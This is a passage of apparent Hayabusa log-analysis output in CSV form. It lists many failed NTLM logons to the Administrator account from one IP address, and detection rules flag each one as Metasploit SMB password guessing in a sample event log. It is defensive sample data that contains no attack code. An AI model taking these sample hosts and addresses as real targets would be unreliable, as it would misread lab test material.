Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:08.000 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2PTxr8Zkz2y2XwBo : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:08.000 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:08.044 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: J3caypkIM2XqoSSF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:08.044 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:08.088 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: yuQOUzJ6sU5AhARR : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:08.088 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:08.128 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: SyM3OrjUHub9k23k : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:08.128 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:08.171 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: vY7SRoWumGQOrljW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:08.171 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:08.212 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: iFrO2nUMlfeDLGyc : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:08.212 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:08.250 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 9B8Gq7d30U8DqdN0 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:08.250 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:08.292 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: yxSPuxpCHgSo1d1a : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:08.292 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:08.342 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 9elGZ4POExblUCAK : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:08.342 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:08.385 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: XHY9Ig3sqQKNXYqq : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:08.385 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:08.424 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: voMDzTqYqKpfudKo : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:08.424 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:08.457 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: m8m9SJ1aFpvFqClU : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:08.457 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:08.496 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: dM84lQYVfHhZmgpK : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:08.496 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:08.541 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: O5FrdBbYXWaqFkeb : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:08.541 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:08.588 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ZxiNMjsd3YfoCNa2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:08.588 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:08.628 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: v1u5uD9SiDFq9VOD : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:08.628 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:08.675 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: pZv9l3b7U8tIVmw8 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:08.675 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:08.716 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 7EfPqiBhm6hRX700 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:08.716 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:08.763 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 3uvqgri2KGIDAlg1 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:08.763 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:08.816 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: oLXZMXKsjOaurgZV : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:08.816 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:08.860 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: nXtiRWHDJqpq69Ej : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:08.860 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:08.915 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: OeC1T9YkT1hXMcGG : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:08.915 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:08.965 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: YPf6nlwAeuu7cf00 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:08.965 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:09.008 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 4fvVUozD2RuIchN4 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:09.008 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:09.052 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: KP3rghcrgas3l3q1 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:09.052 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:09.084 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MMtcQYoVoM57gTcj : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:09.084 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:09.137 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: IFjTWECEep09Abjt : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:09.137 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:09.177 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: jUlguy8tKBo4DSUR : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:09.177 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:09.212 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: GETwMERLpiVtMRkw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:09.212 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:09.248 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Bhas9Vjc193EVcOg : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:09.248 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:09.288 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: OmVAnxq39t7qbcEs : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:09.288 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:09.332 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 13y2nnltjipwZqth : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:09.332 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:09.369 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: wDQrPBL1VodIcQLR : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:09.369 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:09.417 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: K0Mp4jXeHd3b0CLw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:09.417 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:09.472 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 3j89GmIDnG4v7JJC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:09.472 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:09.512 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xyRLZMoaXJUrPPfn : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:09.512 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:09.607 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ZcoyOKUjEi1uCSpD : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:09.607 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:09.648 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: jWQGVJLcVwgf4YJ8 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:09.648 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:09.688 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: mrFqG85mmjTYJ4A9 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:09.688 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:09.728 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 6DqIh1QHTk470nrU : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:09.728 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:09.774 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: feVbA94p6iT2pBeC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:09.774 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:09.804 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: T30YHcE8ZG7FaxW7 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:09.804 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:09.847 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: RaKHRwYtx2lGtOCG : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:09.847 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:09.884 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: zDEDuMmlDZZfdkFD : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:09.884 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:09.935 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: CObqGJQi1hOOI83J : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:09.935 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:10.002 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: EhsE9bQeEwW21bAj : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:10.002 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:10.050 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: El1qxgjvGS0QSS4Y : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:10.050 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB 